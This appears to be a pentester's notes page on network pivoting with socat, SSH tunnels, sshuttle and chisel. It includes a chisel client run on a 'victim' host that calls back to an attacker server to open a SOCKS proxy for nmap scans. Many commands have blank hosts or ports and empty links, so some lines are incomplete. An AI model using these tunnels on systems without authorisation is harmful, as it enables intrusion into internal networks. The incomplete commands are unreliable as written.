# Pivoting ## Port Forwarding The goal is to redirect packet from one port to another port. ``` # from ipv4 to ipv6, all packet to localhost:445 will direct to :445 sudo socat TCP-LISTEN:445, fork TCP::445 ``` **ssh to kali machine**

note: **local-port** and **local-machine** in the kali machine (**attacker**) ``` ssh -R -N :127.0.0.1: root@ ``` ## ## Reverse Proxy ### chisel ref: {% embed url="" %} 1. **Attacker (Kali)** ``` ./chisel server -p 8000 --reverse ```

2. **Run in Victim Machine** **Windows** ```batch chisel.exe client :8000 R:socks ```

**Linux** ```bash ./chisel client :8000 R:sockss ``` 3. **Config the proxychains (Attacker)** change `/etc/proxychains4.conf` ``` [ProxyList] socks5 127.0.0.1 1080 ``` 4. Run command ```bash proxychains nmap -sT -p 88 -Pn -n ``` ### sshuttle Need (user login as ssh) ``` # single sshuttle -r username@remotehost 0.0.0.0/0 # example sshuttle user@192.168.20.35 192.168.30.0/24 sshuttle -r root@10.1.1.1 10.2.2.0/24 ``` {% embed url="" %} {% embed url="" %} ### **SSH Tunnel** nice ref: Can't ssh to machine? ``` ssh -p 22 -R ": ```

## **Forward Proxy** ### **chisel**

https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel

### sshuttle {% embed url="" %} ### SSH Tunnel (Recommended if you wanna access internal port) **Forward Proxy** Need SSH to machine: ``` ssh -D @ #example ssh -D 8989 local@10.10.10.10 ``` It mean, every packet to 127.0.0.1:8989 will be forwarded as IP 10.10.10.10 You can set proxy on your `browser` or `proxychains.conf` ``` [Manual Proxy] socks4 127.0.0.1 8989 ``` Don't forget to using incognito to your browser or clear cache, for better process.

If that internal port have vhost configuration, you must set up that /etc/hosts on kali linux with pointing to local port (/etc/hosts on victim machine). **Case of forward proxy** {% embed url="" %} ## Are you stuck? {% embed url="" %} ### Network Pentest with Chisel